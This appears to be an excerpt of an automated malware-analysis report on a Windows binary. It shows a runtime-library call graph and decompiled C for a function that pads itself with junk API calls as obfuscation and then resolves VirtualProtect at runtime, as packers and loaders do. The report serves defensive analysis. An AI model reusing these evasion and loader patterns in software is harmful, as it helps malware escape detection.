12709->12711 12713 417e8d 12711->12713 12712 40b78c _write_string 68 API calls 12724 417e6c __close 12712->12724 12716 40b78c _write_string 68 API calls 12713->12716 12764 41b159 12714->12764 12718 417e94 12716->12718 12717 417ecf 12719 417ef2 12717->12719 12720 417edc 12717->12720 12721 408baf __close 6 API calls 12718->12721 12723 40b78c _write_string 68 API calls 12719->12723 12774 417718 12720->12774 12721->12724 12726 417ef7 12723->12726 12724->12462 12725 417eea 12833 417f1d 12725->12833 12727 40b79f __close 68 API calls 12726->12727 12727->12725 12730 41760b __close 12729->12730 12731 417638 12730->12731 12732 41761c 12730->12732 12733 417646 12731->12733 12735 417667 12731->12735 12734 40b79f __close 68 API calls 12732->12734 12736 40b79f __close 68 API calls 12733->12736 12737 417621 12734->12737 12739 417687 12735->12739 12740 4176ad 12735->12740 12738 41764b 12736->12738 12741 40b78c _write_string 68 API calls 12737->12741 12743 40b78c _write_string 68 API calls 12738->12743 12744 40b79f __close 68 API calls 12739->12744 12742 41b159 ___lock_fhandle 69 API calls 12740->12742 12753 417629 __close 12741->12753 12745 4176b3 12742->12745 12746 417652 12743->12746 12747 41768c 12744->12747 12748 4176c0 12745->12748 12749 4176dc 12745->12749 12750 408baf __close 6 API calls 12746->12750 12751 40b78c _write_string 68 API calls 12747->12751 12754 41757a __lseeki64_nolock 70 API calls 12748->12754 12755 40b78c _write_string 68 API calls 12749->12755 12750->12753 12752 417693 12751->12752 12756 408baf __close 6 API calls 12752->12756 12753->12462 12757 4176d1 12754->12757 12758 4176e1 12755->12758 12756->12753 12872 41770e 12757->12872 12759 40b79f __close 68 API calls 12758->12759 12759->12757 12762 40de2a __getptd_noexit 68 API calls 12761->12762 12763 40b7a4 12762->12763 12763->12712 12765 41b165 __close 12764->12765 12766 41b1c0 12765->12766 12767 40e43f __lock 68 API calls 12765->12767 12768 41b1e2 __close 12766->12768 12769 41b1c5 EnterCriticalSection 12766->12769 12770 41b191 12767->12770 12768->12717 12769->12768 12771 41b1a8 12770->12771 12772 416ef2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 12770->12772 12836 41b1f0 12771->12836 12772->12771 12775 417727 __write_nolock 12774->12775 12776 417780 12775->12776 12777 417759 12775->12777 12806 41774e 12775->12806 12781 4177e8 12776->12781 12782 4177c2 12776->12782 12778 40b79f __close 68 API calls 12777->12778 12780 41775e 12778->12780 12779 40a40b ___mtold12 5 API calls 12783 417e49 12779->12783 12785 40b78c _write_string 68 API calls 12780->12785 12784 4177fc 12781->12784 12840 41757a 12781->12840 12786 40b79f __close 68 API calls 12782->12786 12783->12725 12789 417f70 __flsbuf 68 API calls 12784->12789 12788 417765 12785->12788 12790 4177c7 12786->12790 12791 408baf __close 6 API calls 12788->12791 12792 417807 12789->12792 12793 40b78c _write_string 68 API calls 12790->12793 12791->12806 12794 417aad 12792->12794 12799 40dea3 __getptd 68 API calls 12792->12799 12795 4177d0 12793->12795 12797 417abd 12794->12797 12798 417d7c WriteFile 12794->12798 12796 408baf __close 6 API calls 12795->12796 12796->12806 12802 417b9b 12797->12802 12822 417ad1 12797->12822 12800 417a8f 12798->12800 12801 417daf GetLastError 12798->12801 12803 417822 GetConsoleMode 12799->12803 12804 417dfa 12800->12804 12800->12806 12809 417dcd 12800->12809 12801->12800 12820 417c7b 12802->12820 12824 417baa 12802->12824 12803->12794 12805 41784d 12803->12805 12804->12806 12808 40b78c _write_string 68 API calls 12804->12808 12805->12794 12807 41785f GetConsoleCP 12805->12807 12806->12779 12807->12800 12831 417882 12807->12831 12810 417e1d 12808->12810 12812 417dd8 12809->12812 12813 417dec 12809->12813 12815 40b79f __close 68 API calls 12810->12815 12811 417ce1 WideCharToMultiByte 12811->12801 12817 417d18 WriteFile 12811->12817 12816 40b78c _write_string 68 API calls 12812->12816 12853 40b7b2 12813->12853 12814 417b3f WriteFile 12814->12801 12814->12822 12815->12806 12823 417ddd 12816->12823 12817->12820 12821 417d4f GetLastError 12817->12821 12818 417c1f WriteFile 12818->12801 12818->12824 12820->12800 12820->12804 12820->12811 12820->12817 12821->12820 12822->12800 12822->12804 12822->12814 12826 40b79f __close 68 API calls 12823->12826 12824->12800 12824->12804 12824->12818 12826->12806 12827 41b3fc 80 API calls __fassign 12827->12831 12828 41792e WideCharToMultiByte 12828->12800 12829 41795f WriteFile 12828->12829 12829->12801 12829->12831 12830 41b220 11 API calls __putwch_nolock 12830->12831 12831->12800 12831->12801 12831->12827 12831->12828 12831->12830 12832 4179b3 WriteFile 12831->12832 12850 418195 12831->12850 12832->12801 12832->12831 12871 41b1f9 LeaveCriticalSection 12833->12871 12835 417f25 12835->12724 12839 40e365 LeaveCriticalSection 12836->12839 12838 41b1f7 12838->12766 12839->12838 12858 41b0e2 12840->12858 12842 417598 12843 4175b1 SetFilePointer 12842->12843 12844 4175a0 12842->12844 12846 4175c9 GetLastError 12843->12846 12847 4175a5 12843->12847 12845 40b78c _write_string 68 API calls 12844->12845 12845->12847 12846->12847 12848 4175d3 12846->12848 12847->12784 12849 40b7b2 __dosmaperr 68 API calls 12848->12849 12849->12847 12851 41815d __isleadbyte_l 78 API calls 12850->12851 12852 4181a4 12851->12852 12852->12831 12854 40b79f __close 68 API calls 12853->12854 12855 40b7bd __dosmaperr 12854->12855 12856 40b78c _write_string 68 API calls 12855->12856 12857 40b7d0 12856->12857 12857->12806 12859 41b107 12858->12859 12860 41b0ef 12858->12860 12863 40b79f __close 68 API calls 12859->12863 12866 41b14c 12859->12866 12861 40b79f __close 68 API calls 12860->12861 12862 41b0f4 12861->12862 12865 40b78c _write_string 68 API calls 12862->12865 12864 41b135 12863->12864 12867 40b78c _write_string 68 API calls 12864->12867 12868 41b0fc 12865->12868 12866->12842 12869 41b13c 12867->12869 12868->12842 12870 408baf __close 6 API calls 12869->12870 12870->12866 12871->12835 12875 41b1f9 LeaveCriticalSection 12872->12875 12874 417716 12874->12753 12875->12874 12877 40fc84 12876->12877 12878 40fc9a EnterCriticalSection 12876->12878 12879 40e43f __lock 68 API calls 12877->12879 12878->12331 12880 40fc8d 12879->12880 12880->12331 12882 4100cc __fileno 68 API calls 12881->12882 12883 41010d 12882->12883 12884 417f70 __flsbuf 68 API calls 12883->12884 12886 410113 __flsbuf 12884->12886 12885 410160 12885->12334 12886->12885 12887 40a295 __malloc_crt 68 API calls 12886->12887 12887->12885 12889 4101a5 12888->12889 12890 409269 12888->12890 12889->12890 12896 4173e7 12889->12896 12892 409281 12890->12892 12893 409286 __flsbuf 12892->12893 12902 40fce5 12893->12902 12895 409291 12895->12332 12897 417400 12896->12897 12901 417422 12896->12901 12898 4100cc __fileno 68 API calls 12897->12898 12897->12901 12899 41741b 12898->12899 12900 417e4b __locking 102 API calls 12899->12900 12900->12901 12901->12890 12903 40fcf5 12902->12903 12904 40fd08 LeaveCriticalSection 12902->12904 12907 40e365 LeaveCriticalSection 12903->12907 12904->12895 12906 40fd05 12906->12895 12907->12906 12909 40fc48 12908->12909 12910 40fc6a EnterCriticalSection 12908->12910 12909->12910 12911 40fc50 12909->12911 12912 4090ee 12910->12912 12913 40e43f __lock 68 API calls 12911->12913 12912->12355 12912->12356 12913->12912 12917 40fca9 12914->12917 12916 4091b3 12916->12360 12918 40fcd9 LeaveCriticalSection 12917->12918 12919 40fcba 12917->12919 12918->12916 12919->12918 12920 40fcc1 12919->12920 12923 40e365 LeaveCriticalSection 12920->12923 12922 40fcd6 12922->12916 12923->12922 12925 406be7 std::_String_base::_Xlen 12924->12925 12934 4069d2 12925->12934 12927 406bee 12928 407411 12927->12928 12929 40582d 12928->12929 12930 40742e 12928->12930 12929->12377 12931 40743c 12930->12931 12983 40712a 12930->12983 12991 40656d 12931->12991 12937 40658e 12934->12937 12936 4069df 12936->12927 12940 405c0b 12937->12940 12941 405c18 12940->12941 12942 405c2a 12940->12942 12950 40892e 12941->12950 12942->12941 12943 405c36 12942->12943 12962 404c20 12943->12962 12949 405c4e 12953 408938 12950->12953 12951 40b500 _malloc 68 API calls 12951->12953 12952 405c25 12952->12936 12953->12951 12953->12952 12954 40e26b __calloc_impl 6 API calls 12953->12954 12958 408954 std::bad_alloc::bad_alloc 12953->12958 12954->12953 12955 40897a 12968 405c4f 12955->12968 12958->12955 12960 408f48 __cinit 75 API calls 12958->12960 12959 408993 __CxxThrowException@8 RaiseException 12961 408992 12959->12961 12960->12955 12977 408053 12962->12977 12965 408993 12966 4089c8 RaiseException 12965->12966 12967 4089bc 12965->12967 12966->12949 12967->12966 12971 4080c3 12968->12971 12972 405c5d 12971->12972 12973 4080e3 _strlen 12971->12973 12972->12959 12973->12972 12974 40b500 _malloc 68 API calls 12973->12974 12975 4080f6 12974->12975 12975->12972 12976 40b449 _strcpy_s 68 API calls 12975->12976 12976->12972 12978 40806c _strlen 12977->12978 12979 404c2f 12977->12979 12980 40b500 _malloc 68 API calls 12978->12980 12979->12965 12981 40807b 12980->12981 12981->12979 12982 40b449 _strcpy_s 68 API calls 12981->12982 12982->12979 12984 407134 __EH_prolog 12983->12984 12994 4070f9 12984->12994 12989 408993 __CxxThrowException@8 RaiseException 12990 407162 12989->12990 13118 405bc9 12991->13118 12995 407107 std::_String_base::_Xlen 12994->12995 13003 406923 12995->13003 12997 407119 13007 406f09 12997->13007 13000 406f6d 13109 406f31 13000->13109 13004 40692f 13003->13004 13005 40694d std::locale::_Locimp::~_Locimp 13003->13005 13004->13005 13011 40659f 13004->13011 13005->12997 13008 406f17 std::locale::_Init 13007->13008 13030 406e75 13008->13030 13010 406f23 13010->13000 13012 4065a8 std::locale::_Locimp::~_Locimp 13011->13012 13015 405c73 13012->13015 13018 404c91 13015->13018 13021 40822d 13018->13021 13020 404ca5 13020->13005 13025 40823d _setlocale 13021->13025 13026 408241 _memset 13021->13026 13022 408246 13023 40b78c _write_string 68 API calls 13022->13023 13024 40824b 13023->13024 13027 408baf __close 6 API calls 13024->13027 13025->13020 13026->13022 13026->13025 13028 408290 13026->13028 13027->13025 13028->13025 13029 40b78c _write_string 68 API calls 13028->13029 13029->13024 13031 406e85 std::locale::_Init 13030->13031 13032 406ea0 13031->13032 13033 406e8b std::locale::_Locimp::~_Locimp 13031->13033 13052 406c3c 13032->13052 13039 406def 13033->13039 13036 406e9e std::locale::_Locimp::~_Locimp 13036->13010 13037 406eaa std::locale::_Locimp::~_Locimp 13037->13036 13038 40659f std::locale::_Locimp::~_Locimp 68 API calls 13037->13038 13038->13036 13040 406dff std::bad_exception::bad_exception 13039->13040 13042 406e0b std::bad_exception::bad_exception 13040->13042 13061 407f62 13040->13061 13043 406e26 13042->13043 13044 406e3c 13042->13044 13071 406971 13043->13071 13045 406c3c std::locale::_Init 76 API calls 13044->13045 13050 406e44 std::locale::_Locimp::~_Locimp 13045->13050 13047 406e30 13049 406971 std::bad_exception::bad_exception 76 API calls 13047->13049 13048 406e3a std::locale::_Locimp::~_Locimp 13048->13036 13049->13048 13050->13048 13051 40659f std::locale::_Locimp::~_Locimp 68 API calls 13050->13051 13051->13048 13053 406c48 std::locale::_Init 13052->13053 13054 406c54 13053->13054 13090 407f2a 13053->13090 13056 406c59 13054->13056 13059 406c66 13054->13059 13098 406a85 13056->13098 13058 406c64 std::locale::_Locimp::~_Locimp 13058->13037 13059->13058 13060 406923 std::locale::_Locimp::~_Locimp 68 API calls 13059->13060 13060->13058 13062 407f6e __EH_prolog3 13061->13062 13063 4070f9 std::_String_base::_Xlen 76 API calls 13062->13063 13064 407f7b 13063->13064 13077 407edb 13064->13077 13067 408993 __CxxThrowException@8 RaiseException 13068 407f99 13067->13068 13080 407163 13068->13080 13072 406981 13071->13072 13075 406986 std::locale::_Locimp::~_Locimp 13071->13075 13073 407f62 std::bad_exception::bad_exception 76 API calls 13072->13073 13073->13075 13074 4069bc std::locale::_Locimp::~_Locimp 13074->13047 13075->13074 13086 4065c3 13075->13086 13078 406f31 std::bad_exception::bad_exception 76 API calls 13077->13078 13079 407eeb 13078->13079 13079->13067 13081 40716d __EH_prolog 13080->13081 13082 4080c3 std::exception::exception 68 API calls 13081->13082 13083 40717e 13082->13083 13084 406ee5 std::bad_exception::bad_exception 76 API calls 13083->13084 13085 407194 13084->13085 13085->13042 13087 4065cc std::locale::_Locimp::~_Locimp 13086->13087 13088 405c8e std::bad_exception::bad_exception 68 API calls 13087->13088 13089 4065e3 13088->13089 13089->13074 13091 407f36 __EH_prolog3 13090->13091 13092 4070f9 std::_String_base::_Xlen 76 API calls 13091->13092 13093 407f43 13092->13093 13094 406f6d std::bad_exception::bad_exception 76 API calls 13093->13094 13095 407f53 13094->13095 13096 408993 __CxxThrowException@8 RaiseException 13095->13096 13097 407f61 13096->13097 13099 406a8f std::locale::_Init __EH_prolog 13098->13099 13106 4064cd 13099->13106 13101 406b30 13102 406923 std::locale::_Locimp::~_Locimp 68 API calls 13101->13102 13104 406b3b std::locale::_Locimp::~_Locimp 13102->13104 13103 406ae8 std::locale::_Locimp::~_Locimp 13103->13101 13105 40659f std::locale::_Locimp::~_Locimp 68 API calls 13103->13105 13104->13058 13105->13101 13107 405b8a std::locale::_Init 76 API calls 13106->13107 13108 4064da 13107->13108 13108->13103 13110 406f3b __EH_prolog std::bad_exception::bad_exception 13109->13110 13113 406ee5 13110->13113 13114 406923 std::locale::_Locimp::~_Locimp 68 API calls 13113->13114 13115 406ef4 13114->13115 13116 406def std::bad_exception::bad_exception 76 API calls 13115->13116 13117 406f02 13116->13117 13117->12989 13119 405be6 13118->13119 13120 405bd6 13118->13120 13119->13120 13121 405bf2 13119->13121 13122 40892e std::locale::_Init 76 API calls 13120->13122 13123 404c20 std::locale::_Init 68 API calls 13121->13123 13124 405be1 13122->13124 13125 405bfc 13123->13125 13124->12929 13126 408993 __CxxThrowException@8 RaiseException 13125->13126 13127 405c0a 13126->13127 13129 40764d __EH_prolog 13128->13129 13140 4075cb 13129->13140 13134 406bf5 13135 406bff __EH_prolog 13134->13135 13389 406512 13135->13389 13137 406c0b 13397 406a01 13137->13397 13139 40583c 13139->12383 13141 4075d5 __EH_prolog 13140->13141 13148 407547 13141->13148 13144 405a80 13145 405a8a __EH_prolog 13144->13145 13146 407d0a std::ios_base::_Addstd 2 API calls 13145->13146 13147 405ad4 13145->13147 13146->13147 13147->13134 13157 4073ac 13148->13157 13152 407567 13153 407579 13152->13153 13172 4074cd 13152->13172 13156 407584 13153->13156 13176 407d0a 13153->13176 13156->13144 13181 40739b 13157->13181 13160 40892e std::locale::_Init 76 API calls 13161 4073df 13160->13161 13162 4073eb 13161->13162 13184 404db6 13161->13184 13164 40745b 13162->13164 13165 407465 __EH_prolog 13164->13165 13247 404ed1 13165->13247 13171 407489 13171->13152 13173 4074d9 13172->13173 13174 4074ec 13172->13174 13385 4073f5 13173->13385 13174->13153 13177 4078f4 std::_Lockit::_Lockit EnterCriticalSection 13176->13177 13178 407d1a 13177->13178 13179 40791c __Fac_tidy LeaveCriticalSection 13178->13179 13180 407d5a 13179->13180 13180->13156 13189 407288 13181->13189 13195 407ba2 13184->13195 13186 404dbe std::locale::locale 13211 404d2f 13186->13211 13193 407292 __EH_prolog 13189->13193 13190 40732f 13190->13160 13191 408993 __CxxThrowException@8 RaiseException 13191->13193 13192 4070f9 76 API calls std::_String_base::_Xlen 13192->13193 13193->13190 13193->13191 13193->13192 13194 4070b4 76 API calls std::bad_exception::bad_exception 13193->13194 13194->13193 13196 407bae __EH_prolog3 13195->13196 13197 407c34 std::locale::_Init 13196->13197 13216 4078f4 13196->13216 13197->13186 13200 407c1e 13228 40791c 13200->13228 13202 40892e std::locale::_Init 76 API calls 13203 407bd7 13202->13203 13204 407beb 13203->13204 13220 407afb 13203->13220 13224 4079d6 13204->13224 13208 406f09 std::locale::_Init 76 API calls 13209 407c11 13208->13209 13210 404d2f std::locale::facet::_Incref 2 API calls 13209->13210 13210->13200 13212 4078f4 std::_Lockit::_Lockit EnterCriticalSection 13211->13212 13213 404d40 13212->13213 13214 40791c __Fac_tidy LeaveCriticalSection 13213->13214 13215 404d54 13214->13215 13215->13162 13217 407914 13216->13217 13218 407906 13216->13218 13217->13200 13217->13202 13232 407fd7 EnterCriticalSection 13218->13232 13221 407b07 __EH_prolog3 13220->13221 13222 4070f9 std::_String_base::_Xlen 76 API calls 13221->13222 13223 407b3a std::locale::_Init 13222->13223 13223->13204 13225 4079e4 13224->13225 13226 4079f5 13224->13226 13233 407ff7 13225->13233 13226->13208 13229 407931 13228->13229 13230 407923 13228->13230 13229->13197 13246 407fe7 LeaveCriticalSection 13230->13246 13232->13217 13234 408005 13233->13234 13235 40800b 13233->13235 13236 408f85 13234->13236 13237 40f97b __NMSG_WRITE 68 API calls 13234->13237 13235->13226 13238 40f7be _abort 6 API calls 13236->13238 13237->13236 13239 408f8b 13238->13239 13240 408f96 _memset 13239->13240 13242 40f7cb _raise 68 API calls 13239->13242 13241 40906e 13240->13241 13244 40902e SetUnhandledExceptionFilter UnhandledExceptionFilter 13240->13244 13243 40f6e7 _raise 68 API calls 13241->13243 13242->13240 13245 409075 13243->13245 13244->13241 13246->13229 13272 404dd0 13247->13272 13250 4071c1 13251 4071cb __EH_prolog 13250->13251 13252 4078f4 std::_Lockit::_Lockit EnterCriticalSection 13251->13252 13253 4071da 13252->13253 13275 404cfa 13253->13275 13255 4071f1 13256 407204 13255->13256 13281 40700b 13255->13281 13257 40791c __Fac_tidy LeaveCriticalSection 13256->13257 13258 407259 13257->13258 13268 404de9 13258->13268 13261 407236 13262 404d2f std::locale::facet::_Incref 2 API calls 13261->13262 13264 407246 13262->13264 13298 404d92 13264->13298 13266 408993 __CxxThrowException@8 RaiseException 13266->13261 13269 404df4 13268->13269 13270 404def 13268->13270 13269->13171 13380 404d57 13270->13380 13273 404d2f std::locale::facet::_Incref 2 API calls 13272->13273 13274 404de2 13273->13274 13274->13250 13276 404d06 13275->13276 13277 404d2a 13275->13277 13278 4078f4 std::_Lockit::_Lockit EnterCriticalSection 13276->13278 13277->13255 13279 404d10 13278->13279 13280 40791c __Fac_tidy LeaveCriticalSection 13279->13280 13280->13277 13283 407015 __EH_prolog 13281->13283 13282 4070a4 13282->13261 13295 408143 13282->13295 13283->13282 13284 40892e std::locale::_Init 76 API calls 13283->13284 13285 407033 13284->13285 13286 407074 13285->13286 13301 406fee 13285->13301 13288 407096 13286->13288 13322 406d98 13286->13322 13288->13282 13336 406ba5 13288->13336 13296 408053 std::exception::exception 68 API calls 13295->13296 13297 407228 13296->13297 13297->13266 13360 407a95 13298->13360 13302 406ee5 std::bad_exception::bad_exception 76 API calls 13301->13302 13303 407004 13302->13303 13304 406d3c 13303->13304 13305 406d46 __EH_prolog 13304->13305 13306 4078f4 std::_Lockit::_Lockit EnterCriticalSection 13305->13306 13307 406d54 13306->13307 13339 406b84 13307->13339 13310 406b84 68 API calls 13311 406d68 13310->13311 13312 406b84 68 API calls 13311->13312 13313 406d70 13312->13313 13314 406b84 68 API calls 13313->13314 13315 406d78 13314->13315 13343 407c3c 13315->13343 13318 405ca9 13319 405cb7 std::bad_exception::bad_exception 13318->13319 13353 404ea8 13319->13353 13323 406da2 __EH_prolog 13322->13323 13356 407ad3 13323->13356 13326 406ba5 Mailbox 68 API calls 13327 406dbf 13326->13327 13328 406ba5 Mailbox 68 API calls 13327->13328 13329 406dc7 13328->13329 13330 406ba5 Mailbox 68 API calls 13329->13330 13331 406dcf 13330->13331 13332 406ba5 Mailbox 68 API calls 13331->13332 13333 406dd7 13332->13333 13334 40791c __Fac_tidy LeaveCriticalSection 13333->13334 13335 406de2 13334->13335 13335->13288 13337 406923 std::locale::_Locimp::~_Locimp 68 API calls 13336->13337 13338 406bae 13337->13338 13338->13282 13340 406b8f std::_String_base::_Xlen 13339->13340 13341 406923 std::locale::_Locimp::~_Locimp 68 API calls 13340->13341 13342 406ba1 13341->13342 13342->13310 13344 407c4c 13343->13344 13345 40b2d9 _setlocale 119 API calls 13344->13345 13346 407c5d 13345->13346 13347 406f09 std::locale::_Init 76 API calls 13346->13347 13348 407c74 13347->13348 13349 407c80 13348->13349 13350 40b2d9 _setlocale 119 API calls 13348->13350 13351 406f09 std::locale::_Init 76 API calls 13349->13351 13350->13349 13352 406d85 13351->13352 13352->13318 13354 404cd7 std::_Locinfo::_Getctype 76 API calls 13353->13354 13355 404ebe 13354->13355 13355->13286 13357 407ae1 13356->13357 13358 406db6 13356->13358 13359 40b2d9 _setlocale 119 API calls 13357->13359 13358->13326 13359->13358 13361 407aa3 13360->13361 13362 407aad 13360->13362 13366 407933 13361->13366 13363 40892e std::locale::_Init 76 API calls 13362->13363 13365 404d98 13363->13365 13365->13256 13367 408f48 __cinit 75 API calls 13366->13367 13370 407940 13367->13370 13368 40794b 13368->13362 13369 408f85 13372 40f7be _abort 6 API calls 13369->13372 13370->13368 13370->13369 13371 40f97b __NMSG_WRITE 68 API calls 13370->13371 13371->13369 13373 408f8b 13372->13373 13374 408f96 _memset 13373->13374 13376 40f7cb _raise 68 API calls 13373->13376 13375 40906e 13374->13375 13378 40902e SetUnhandledExceptionFilter UnhandledExceptionFilter 13374->13378 13377 40f6e7 _raise 68 API calls 13375->13377 13376->13374 13379 409075 13377->13379 13378->13375 13381 4078f4 std::_Lockit::_Lockit EnterCriticalSection 13380->13381 13382 404d69 13381->13382 13383 40791c __Fac_tidy LeaveCriticalSection 13382->13383 13384 404d8c 13383->13384 13384->13269 13386 407401 13385->13386 13387 407288 76 API calls 13386->13387 13388 40740d 13387->13388 13388->13174 13390 40651c __EH_prolog 13389->13390 13403 407eaa 13390->13403 13393 40892e std::locale::_Init 76 API calls 13394 40653c 13393->13394 13395 404db6 std::locale::locale 80 API calls 13394->13395 13396 406548 13394->13396 13395->13396 13396->13137 13398 406a19 13397->13398 13402 406a37 Mailbox 13397->13402 13399 4064cd std::locale::_Init 76 API calls 13398->13399 13398->13402 13400 406a2a 13399->13400 13401 40659f std::locale::_Locimp::~_Locimp 68 API calls 13400->13401 13401->13402 13402->13139 13404 40892e std::locale::_Init 76 API calls 13403->13404 13405 407eb6 13404->13405 13408 407fb7 InitializeCriticalSection 13405->13408 13407 406531 13407->13393 13408->13407 13410 40dc57 __decode_pointer 6 API calls 13409->13410 13411 408f8b 13410->13411 13411->12389 13412 40f7cb 13411->13412 13413 40f7d7 __close 13412->13413 13414 40f833 13413->13414 13415 40f7fe 13413->13415 13416 40f814 13413->13416 13422 40f7fa 13413->13422 13414->13416 13419 40f842 13414->13419 13417 40de2a __getptd_noexit 68 API calls 13415->13417 13418 40dc57 __decode_pointer 6 API calls 13416->13418 13420 40f803 _siglookup 13417->13420 13418->13420 13421 40b78c _write_string 68 API calls 13419->13421 13424 40f8a9 13420->13424 13426 40f6e7 _raise 68 API calls 13420->13426 13432 40f80c __close 13420->13432 13423 40f847 13421->13423 13422->13415 13422->13419 13425 408baf __close 6 API calls 13423->13425 13427 40e43f __lock 68 API calls 13424->13427 13429 40f8b4 13424->13429 13425->13432 13426->13424 13427->13429 13428 40dc4e _raise 7 API calls 13430 40f8e9 13428->13430 13429->13428 13429->13430 13436 40f93f 13430->13436 13432->12389 13441 40f5a5 13433->13441 13435 409075 13437 40f945 13436->13437 13438 40f94c 13436->13438 13440 40e365 LeaveCriticalSection 13437->13440 13438->13432 13440->13438 13442 40f5b1 __close 13441->13442 13443 40e43f __lock 68 API calls 13442->13443 13444 40f5b8 13443->13444 13447 40dc57 __decode_pointer 6 API calls 13444->13447 13451 40f671 __initterm 13444->13451 13449 40f5ef 13447->13449 13448 40f6b9 __close 13448->13435 13449->13451 13453 40dc57 __decode_pointer 6 API calls 13449->13453 13458 40f6bc 13451->13458 13452 40f6b0 13454 40f4b5 _malloc 3 API calls 13452->13454 13457 40f604 13453->13457 13454->13448 13455 40dc57 6 API calls __decode_pointer 13455->13457 13456 40dc4e 7 API calls _raise 13456->13457 13457->13451 13457->13455 13457->13456 13459 40f6c2 13458->13459 13460 40f69d 13458->13460 13463 40e365 LeaveCriticalSection 13459->13463 13460->13448 13462 40e365 LeaveCriticalSection 13460->13462 13462->13452 13463->13460

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 405467-405474 1 405476-40547c 0->1 2 40548b-405491 1->2 3 40547e-405485 SetLastError GetTickCount 1->3 4 405493-40549a 2->4 5 4054a5-4054ac 2->5 3->2 4->5 6 40549c-4054a3 4->6 5->1 7 4054ae 5->7 6->5 6->7 8 4054b0-4054b6 7->8 9 4054c3-4054ca 8->9 10 4054b8-4054bd 8->10 11 4054d7-4054de 9->11 12 4054cc-4054d1 LoadLibraryA 9->12 10->9 11->8 13 4054e0-4054ed call 405453 11->13 12->11 16 405533-40553a 13->16 17 4054ef-4054fc call 405224 13->17 19 40553f-405549 16->19 23 40552a-405531 17->23 24 4054fe-405524 AreFileApisANSI GetNamedPipeHandleStateW InterlockedIncrement 17->24 21 4055b5-4055b6 19->21 22 40554b-4055b3 GetConsoleAliasExesLengthW EnumCalendarInfoW InterlockedExchange GetPrivateProfileStructA EnterCriticalSection InterlockedCompareExchange EnumCalendarInfoA LocalUnlock CancelDeviceWakeupRequest GetComputerNameW EnterCriticalSection 19->22 21->19 25 4055b8-4055c1 21->25 22->21 23->16 23->17 24->23 26 4055c6-4055cd 25->26 27 4055d2-4055d9 26->27 28 4055cf-4055d0 GetModuleHandleA 26->28 29 4055e3-4055ed 27->29 30 4055db-4055de GetModuleHandleA 27->30 28->27 29->26 31 4055ef-405607 GetProcAddress 29->31 30->29 32 405609-40560c 31->32 33 405613-40561a 32->33 34 40560e call 405355 32->34 33->32 36 40561c-405632 call 4051a8 33->36 34->33 39 405634-40563b 36->39 40 405651-405657 39->40 41 40563d-40564b InterlockedIncrement GetCharWidthA 39->41 42 405659 call 405347 40->42 43 40565e-405665 40->43 41->40 42->43 43->39 45 405667 43->45 46 40566c-405673 45->46 47 405675-405677 SetThreadToken 46->47 48 40567d-40567e 46->48 47->48 48->46 49 405680 call 404f21 48->49 51 405685-405695 49->51 52 4056d6-4056de 51->52 53 405697-4056d4 FindNextVolumeA GetModuleHandleA CreateActCtxW VerifyVersionInfoA InterlockedDecrement InterlockedIncrement MoveFileWithProgressA 51->53 54 4056e4-4057d8 WriteConsoleW GlobalFindAtomW LoadLibraryW MoveFileWithProgressA SetProcessAffinityMask GetACP DefineDosDeviceW GetDiskFreeSpaceExW InterlockedExchange GetPrivateProfileStructW LockFile _lread ReadConsoleInputW GetPrivateProfileIntA OpenJobObjectW GetTapeParameters GetMailslotInfo CopyFileW GetSystemWindowsDirectoryA OpenFileMappingA GetConsoleAliasesLengthA SetFileTime 52->54 55 4057de-4057e8 call 405341 52->55 53->52 54->55
                  C-Code - Quality: 83%
                  			E00405467(void* __ecx) {
                  				long _v8;
                  				long _v12;
                  				long _v16;
                  				long _v20;
                  				struct _FILETIME _v28;
                  				struct _FILETIME _v36;
                  				union _ULARGE_INTEGER _v44;
                  				struct _FILETIME _v52;
                  				union _ULARGE_INTEGER _v60;
                  				union _ULARGE_INTEGER _v68;
                  				struct _INPUT_RECORD _v88;
                  				struct _CRITICAL_SECTION _v92;
                  				struct _CRITICAL_SECTION _v116;
                  				intOrPtr _v120;
                  				char _v124;
                  				struct _OSVERSIONINFOEXA _v288;
                  				void _v1312;
                  				char _v2336;
                  				short _v3360;
                  				int _t57;
                  				void* _t112;
                  				void* _t114;
                  				void* _t117;
                  				void* _t118;
                  				void* _t119;
                  				CHAR* _t121;
                  				void* _t122;
                  				void* _t123;
                  				void* _t124;
                  				intOrPtr* _t125;
                  
                  				_t112 = __ecx;
                  				_t117 = 0;
                  				L1:
                  				L1:
                  				if(_t117 < 0x214cd) {
                  					SetLastError(0);
                  					GetTickCount();
                  				}
                  				if(_t117 <= 0x1e9d5e41 || _v8 == 0xad5cf7 || _v120 == 0xad4c41c) {
                  					goto L6;
                  				}
                  				L7:
                  				_t118 = 0;
                  				do {
                  					if(_t118 == 0x420) {
                  						 *0x588f80 =  *0x588f80 + 0x38d6;
                  					}
                  					if( *0x588f80 == 0x7a) {
                  						LoadLibraryA("Cixofarifozehuv rilivavihe rofa juyunevame");
                  					}
                  					_t118 = _t118 + 1;
                  				} while (_t118 < 0x40dece);
                  				E00405453();
                  				_t119 = 0;
                  				if( *0x588f80 > 0) {
                  					do {
                  						E00405224(_t119);
                  						if( *0x588f80 == 0x1f) {
                  							AreFileApisANSI();
                  							GetNamedPipeHandleStateW(0,  &_v12,  &_v16,  &_v20,  &_v8,  &_v3360, 0);
                  							InterlockedIncrement(0);
                  						}
                  						_t119 = _t119 + 1;
                  					} while (_t119 <  *0x588f80);
                  				}
                  				_t114 = 0x5aedbe7;
                  				do {
                  					if( *0x588f80 == 0x2f3) {
                  						__imp__GetConsoleAliasExesLengthW();
                  						EnumCalendarInfoW(0, 0, 0, 0);
                  						InterlockedExchange( &_v12, 0);
                  						GetPrivateProfileStructA(0, 0,  &_v1312, 0, 0);
                  						EnterCriticalSection( &_v92);
                  						InterlockedCompareExchange(0, 0, 0);
                  						EnumCalendarInfoA(0, 0, 0, 0);
                  						LocalUnlock(0);
                  						CancelDeviceWakeupRequest(0);
                  						GetComputerNameW( &_v3360,  &_v16);
                  						EnterCriticalSection( &_v116);
                  					}
                  					_t114 = _t114 - 1;
                  				} while (_t114 != 0);
                  				_v8 = 0;
                  				_t121 = "VirtualProtect";
                  				do {
                  					if( *0x588f80 == 0x2e) {
                  						GetModuleHandleA(0);
                  					}
                  					if(_v8 == 0x76069) {
                  						 *0x5873fc = GetModuleHandleA(_t121);
                  					}
                  					_v8 = _v8 + 1;
                  				} while (_v8 < 0x1756bb);
                  				"VirtualProtect" = 0;
                  				 *0x431ac4 = GetProcAddress( *0x5873fc, _t121);
                  				_t122 = 0;
                  				do {
                  					if(_t122 == 0x1c) {
